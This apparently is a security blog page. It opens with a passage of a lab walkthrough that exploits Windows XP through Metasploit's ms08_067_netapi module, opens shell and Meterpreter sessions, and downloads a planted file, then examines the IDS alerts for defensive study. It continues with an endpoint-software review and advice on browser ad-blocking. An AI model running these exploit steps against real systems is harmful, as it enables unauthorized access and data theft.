msf exploit(ms08_067_netapi) > exploit

And just like that we have a Metasploit shell (in blue) and we can remotely see the target system's desktop (the black command prompt window is on the target system).




At this point we have successfully compromised the target system (using probably one of the oldest exploits for XP – but we are just getting started!). But before we move forward with a little more compromising, let's check what, if anything, we have from the detection point of view after our first attack.

Here is what we see in the IDS so far:


IDS VNC Detection

Now, besides the fact that the IDS triggered on our first exploit, I am even more happy to see that our IDS deployment is working overall!

Now let's look at some of the alert details. The first alert seems to indicate that a Metasploit reverse shell with executable code was detected. The other three alerts are related to a known critical buffer overflow vulnerability that exists in unpatched versions of Windows.

Based on the above, we have the basic information needed to initiate the Response stage. We know the malicious source IP as well as the IP of the impacted host in our environment. But before we move forward with the response, let's do a little bit more compromising and see whether our second attempt is successful.

Compromise 2

In the second Compromise stage we are using the same exploit as in the first (ms08_067_netapi); however, our payload is now different.

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set rhost
rhost =>
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to
[*] Command shell session 2 opened ( -> at 2014-06-22 17:49:04 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


As you will notice from the above, our payload was successfully delivered on the target system and in return gave us access to the target system's shell. Now, to make this scenario more interesting, I created a text file on the Windows XP target machine and named it Important.txt, in My Documents under the Administrator account. My goal will be to read the content of that file from my Metasploit system and possibly copy it out to my local hacking machine.

Accessing Important.txt File

In the screenshot above we are able to change directory from C:\WINDOWS\system32, go to My Documents of the Administrator account and view the content of the Important.txt file.

So with the above, our first goal is complete – we have been able to read the content of the Important.txt file. The second goal was to copy the file out to our local Metasploit machine. For this we established another session with our target Windows machine; instead of a Windows shell, this time our payload gave us a Meterpreter session.

Download Important.txt From Target To Local System

After the successful payload delivery, we ran the getpid command to see which process on the target machine we were bound to (this will come in handy in the Response stage). After that we changed directories to the Administrator user's documents and downloaded Important.txt successfully.

This concludes the Compromise 2 stage. At this point our target Windows XP system is thoroughly owned! The IDS has now triggered a total of 12 alerts related to this event:

Total IDS Alerts

Now we will move towards the Response phase.


We already know that our Windows XP machine is compromised, so we will proceed with collecting the memory of the system. In addition, we will run some Sysinternals tools to confirm the network communication to the malicious IP and determine the process that was involved in this communication…
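Confirming that communication can be as simple as filtering netstat-style output for the malicious IP and noting the owning PID. A minimal sketch; the sample lines and IP addresses below are made-up placeholders for illustration, not artifacts from this case:

```python
def connections_to(bad_ip, netstat_lines):
    """Return (local, remote, state, pid) rows whose remote side matches bad_ip.

    Expects lines shaped like Windows `netstat -ano` output:
      proto  local-address  foreign-address  state  pid
    """
    hits = []
    for line in netstat_lines:
        parts = line.split()
        if len(parts) == 5 and parts[2].startswith(bad_ip + ":"):
            hits.append((parts[1], parts[2], parts[3], int(parts[4])))
    return hits

# Hypothetical sample output; addresses are placeholders.
sample = [
    "TCP  192.168.1.20:1042  192.168.1.50:4444  ESTABLISHED  1084",
    "TCP  192.168.1.20:139   0.0.0.0:0          LISTENING    4",
]
print(connections_to("192.168.1.50", sample))
# → [('192.168.1.20:1042', '192.168.1.50:4444', 'ESTABLISHED', 1084)]
```

The PID pulled out this way is what you would then cross-reference against the process listing (for example, Sysinternals' process tools) to identify the process behind the connection.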


Support For Your Anti-Virus

A few months ago I published two blogs about having additional layers of security for your home computers. You can read them here: part 1 and part 2. The goal of those two blogs was first to bring awareness, using my personal experience, to how we simply cannot rely on anti-virus software to protect our personal computers. And second, to demonstrate how effective some free browser extensions are in preventing unwanted and potentially malicious programs from downloading in the background without much of our knowledge or interaction.

This blog is not exactly a continuation of the other two, but it is definitely related. While in the previous posts I focused on free extensions, in this post I want to talk about an application that, though not free, is definitely worth looking into.

That application is EXE Radar Pro from the NoVirusThanks group (besides this particular software, the group has a bunch of free and extremely useful online utilities that I have been using for some time, and you should check those out too!). As far as EXE Radar Pro goes, it costs $19.99 with the option to try it free for 30 days. They do a pretty straightforward job of explaining what the software does, so I won't waste time repeating what is already there. Instead I will briefly explain my experience with this software; both the pros and the cons.

First the pros: the software is easy to install and seems to get to work immediately. There isn't a lot of configuration or an overly complicated interface that you need to worry about; it simply sits in your Windows tray and all of the management is done by selecting the tray icon. One of the more specific things I like about this software is that I think this is the closest you can get to enterprise-level endpoint monitoring software for such a low price. The software tracks pretty much all the running system processes and their associated parent processes, and monitors as new processes start. You also have the ability to tag processes to either a blacklist or a whitelist based on what you think should be allowed or blocked. The software prompts you when it thinks a suspicious/unknown process is trying to run. I believe some of the basic checks it does to tell a good process from a bad one are checking whether the process itself is digitally signed and whether it is being run with any specific/unusual command arguments. In fact, it presents all this information in the prompt dialog:

EXE Radar Pro - Prompt Alert


From the dialog above you can simply choose to allow, block, or use the drop-down arrow to add the process to either the whitelist or the blacklist. While the above dialog box is well designed and self-explanatory, I also experienced some annoying cons with it. For example, when you are prompted with the dialog box you do not have the option to ignore it. You can move it around the screen to get it out of the way, but you have to make the decision to either allow or block. In addition, until you make your selection, you will not be able to execute another process. For example, when the above prompt came up on my screen and I wanted to take the screenshot using the Microsoft built-in Snipping Tool, I was not able to, because the snipping application would not execute until I made my selection in the dialog box (I was able to do it using the keyboard Print Screen key).

The second major con I experienced is that on each boot of the system there would be a half-dozen prompts that I had to go through before the system was fully up and functional. I understand that some learning is involved in the beginning for the software, but even after two weeks and several whitelistings I would still receive numerous prompts during startup. And as you can imagine, when you are trying to get something done quickly, these prompts become irritating. In fact, one of the applications that EXE Radar Pro did not like in particular was Splunk. Well before I downloaded EXE Radar Pro, I had Splunk Free installed on the computer to do basic log analysis. But once I installed EXE Radar Pro, I would constantly get prompts. Eventually I became irritated and ended up uninstalling Splunk from the system. In fact, even during the uninstall process of Splunk, I had to hit Allow at least 8 times before the uninstall completed.

Overall, EXE Radar Pro is a good piece of software for personal use because it provides that additional layer of protection and control around what runs on your system. I would say that while the interface is simple and self-explanatory, an average user may not appreciate the frequency of the prompts, the technical details and the decision-making that is required. On the other hand, if you like having such visibility and control over your system, then for $19.99 you cannot go wrong with this software!




This is the second part of my layered security for home users topic. Please read part 1 first to get the full background.

Recently my father purchased a new laptop for both personal and work use. And like many parents, he is decent when it comes to technology; he is able to perform many of the basic computer functions such as email, YouTube, Skype, social media and online searches. But when it comes to security, like many others, he simply relies on the anti-virus software. I usually install the anti-virus software and configure scheduled scans for him, but this time he was away and had his computer set up by the store he purchased it from. The store tech support installed the Norton 360 suite. Now, even though I have my preferences when it comes to anti-virus software vendors, when it comes to layered security it does not matter.

My father used his new laptop for roughly two months before he had me look at it. At first glance the system looked fine; Norton 360 was not complaining about anything and the system performance was also fine. But when I opened the browsers (IE & Chrome) it was hard to locate the address bar, because the browser windows were covered with numerous advertising toolbars. Also, both browsers had a different home page, and the default search engines had changed as well. At this point I knew that some cleanup was needed.

I started with my go-to software: Malwarebytes. I used it to perform a full sweep of the system, and after 3 hours it came back with more than 200 findings. When I looked at the scan logs I found something interesting. Besides a handful of malicious executables, everything else was categorized as a PUP, a Potentially Unwanted Program: “a piece of software that is also downloaded when a user downloads a specific program or application.”

Now, I have previous experience responding to malicious activity generated by PUPs. Usually this came through an IDS alert when one of these PUPs beaconed out. But in this case, my father's system did not generate any IDS alerts; maybe because it had been on the network for less than 3 hours. Regardless, I decided to remove all of the findings and then confirmed their removal with a subsequent scan.

And this is where the fun part begins. What do you do when you have cleaned up an infected system? Well, it's time to put a few protective measures in place. Most tech support personnel perform this step by simply selling and installing a different anti-virus product. But this measure fails immediately, because they do not take the time to understand how the system got infected in the first place and how the user uses his/her system.

In my father's case, the system got infected due to his careless behavior while surfing online; this usually happens when he is searching. He has a hard time differentiating between legitimate links and advertisements. And because of this, he tends to click on popups. Now, in a perfect world you would do some security knowledge transfer and hope for a change in behavior. However, this is not that easy, so we have to complement it with something else. This is what has worked in my case: an ad blocker.

I installed the AdBlock browser extension for both IE and Chrome on my father's computer. This complemented activating the browsers' built-in popup-blocking functionality. AdBlock “blocks banners, pop-ups and video ads – even on Facebook and YouTube”, which is perfect for someone who surfs the web most of the time.

In addition to the ad blocker, I also installed the DoNotTrackMe extension. The reason for this is that even though AdBlock does a great job of blocking popups and other online advertisements, there is only so much it can do against today's smart advertisements. It is no surprise that online advertising these days is very targeted: your online browsing behavior is tracked, and based on this behavior you are presented with advertisements. This makes it extremely difficult to differentiate between legitimate search results and advertisements.

During the time that I monitored my father's machine (~3 weeks) with both of these extensions enabled, I noticed a significant decrease in the number of malware and PUPs installed on the system. In fact, during this time I ran four Malwarebytes scans, which came back with between 5 and 8 findings. Interestingly enough, by the end of my monitoring the AdBlock extension had blocked 6,370 ads and DoNotTrackMe had blocked 4,269 trackers.

In conclusion, layered security has proven to be effective in our enterprises, and now it's time we take this idea and implement it in our home systems. The free browser-extension solution I present here is by no means complete or elaborate; however, in my test above it proved effective in blocking drive-by downloads (at a basic level) at zero cost!
